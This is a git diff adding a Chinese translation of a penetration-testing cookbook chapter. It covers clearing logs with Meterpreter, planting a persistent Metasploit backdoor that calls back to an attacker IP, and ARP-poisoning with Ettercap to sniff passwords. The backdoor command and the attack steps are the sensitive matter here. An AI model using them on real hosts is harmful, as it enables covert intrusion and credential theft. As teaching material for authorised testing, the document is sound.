ch7
This commit is contained in:
parent
373d71bf54
commit
7dc547df92
130
ch7.md
130
ch7.md
|
@ -329,3 +329,133 @@
|
|||
### 工作原理
|
||||
|
||||
这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了`Log.clear `命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的操作,这样只会更加更多的日志条目。
|
||||
|
||||
## 7.6 创建永久后门
|
||||
|
||||
这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。
|
||||
|
||||
### 准备
|
||||
|
||||
为了执行这个秘籍,我们需要:
|
||||
|
||||
+ 内部网络或互联网的连接。
|
||||
|
||||
+ 使用 Metasploit 框架的具有漏洞的主机。
|
||||
|
||||
### 操作步骤
|
||||
|
||||
让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。
|
||||
|
||||
1. 一旦你通过 Metasploit 和 Meterpreter shell 获得了受害者的访问权限,等待你的 Meterpreter 显示提示符。
|
||||
|
||||
![](img/7-6-1.jpg)
|
||||
|
||||
2. 下面,我们需要运行 persistence,以便创建我们的后门。我们打开帮助文件:
|
||||
|
||||
```
|
||||
run persistence –h
|
||||
```
|
||||
|
||||
3. 永久后门有几个选项,包括:
|
||||
|
||||
+ `-A`:这个选项会自动启动一个匹配的多重处理器来链接到代理端。
|
||||
|
||||
+ `-S`:这个选项让后门自动化启动为系统服务。
|
||||
|
||||
+ `-U`:这个选项让后门在用户启动系统时自动启动。
|
||||
|
||||
+ `-i`:这个选项设置两次尝试回复攻击者机器之间的秒数。
|
||||
|
||||
+ `-p`:这个选项设置攻击者机器上 Metasploit 的监听端口。
|
||||
|
||||
+ `-P`:这个选项设置所用的载荷。默认使用` Reverse_tcp `,并且它通常是你想使用的东西。
|
||||
|
||||
+ `-r`:这个选项设置攻击者机器的 IP 地址。
|
||||
|
||||
4. 现在,我们指定命令来建立后门:
|
||||
|
||||
```
|
||||
run persistence –U –A –i 10 – 8090 –r 192.168.10.109
|
||||
```
|
||||
|
||||
5. 后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。
|
||||
|
||||
![](img/7-6-2.jpg)
|
||||
|
||||
### 工作原理
|
||||
|
||||
这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。
|
||||
|
||||
## 7.7 中间人(MITM)攻击
|
||||
|
||||
这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在<http://www.yahoo.com>收发邮件时,我们使用 Ettercap 来窃听它的通信。
|
||||
|
||||
### 准备
|
||||
|
||||
为了执行这个秘籍,我们需要:
|
||||
|
||||
+ 无线网络连接
|
||||
|
||||
+ 连接到无线网络的机器
|
||||
|
||||
### 操作步骤
|
||||
|
||||
让我们启动 Ettercap 来开始中间人攻击。
|
||||
|
||||
1. 打开终端窗口并启动 Ettercap。使用`-G`选项加载 GUI:
|
||||
|
||||
```
|
||||
ettercap –G
|
||||
```
|
||||
|
||||
![](img/7-7-1.jpg)
|
||||
|
||||
2. 我们以打开` Unified sniffing`(统一嗅探)开始。你可以按下`Shift + U`或者访问菜单中的` Sniff | Unified sniffing`。
|
||||
|
||||
![](img/7-7-2.jpg)
|
||||
|
||||
3. 选择网络接口。在发起 MITM 攻击的情况中,我们应该选项我们的无线接口。
|
||||
|
||||
![](img/7-7-3.jpg)
|
||||
|
||||
4. 下面,我们打开`Scan for hosts`(扫描主机)。可以通过按下`Ctrl + S`或访问菜单栏的` Hosts | Scan for hosts`来完成。
|
||||
|
||||
![](img/7-7-4.jpg)
|
||||
|
||||
5. 下面,我们得到了`Host List`(主机列表)。你可以按下`H`或者访问菜单栏的`Hosts | Host List`。
|
||||
|
||||
![](img/7-7-5.jpg)
|
||||
|
||||
6. 我们下面需要选择或设置我们的目标。在我们的例子中,我们选择`192.168.10.111`作为我们的`Target 1`,通过选中它的 IP 地址并按下` Add To Target 1 `(添加到目标 1)按钮。
|
||||
|
||||
![](img/7-7-6.jpg)
|
||||
|
||||
7. 现在我们能够让 Ettercap 开始嗅探了。你可以按下`Ctrl + W`或访问菜单栏的` Start | Start sniffing`。
|
||||
|
||||
![](img/7-7-7.jpg)
|
||||
|
||||
8. 最后,我们开始进行 ARP 毒化。访问菜单栏的`Mitm | Arp poisoning`。
|
||||
|
||||
![](img/7-7-8.jpg)
|
||||
|
||||
9. 在出现的窗口中,选中` Sniff remote connections`(嗅探远程连接)的选项。
|
||||
|
||||
![](img/7-7-9.jpg)
|
||||
|
||||
0. 取决于网络环境,我们会看到信息。
|
||||
|
||||
![](img/7-7-10.jpg)
|
||||
|
||||
1. 一旦我们找到了想要找的信息(用户名和密码)。我们可以关闭 Ettercap。你可以按下`Ctrl + E`或访问菜单栏的`Start | Stop sniffing`来完成它。
|
||||
|
||||
![](img/7-7-11.jpg)
|
||||
|
||||
2. 现在我们关闭 ARP 毒化,使网络恢复正常。
|
||||
|
||||
![](img/7-7-12.jpg)
|
||||
|
||||
### 工作原理
|
||||
|
||||
这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。
|
||||
|
||||
> 你可以通过浏览<http://en.wikipedia.org/wiki/Man-in-the-middle_attack#Example_of_an_attack>来了解更多关于 MITM 的信息。
|
||||
|
|
Loading…
Reference in New Issue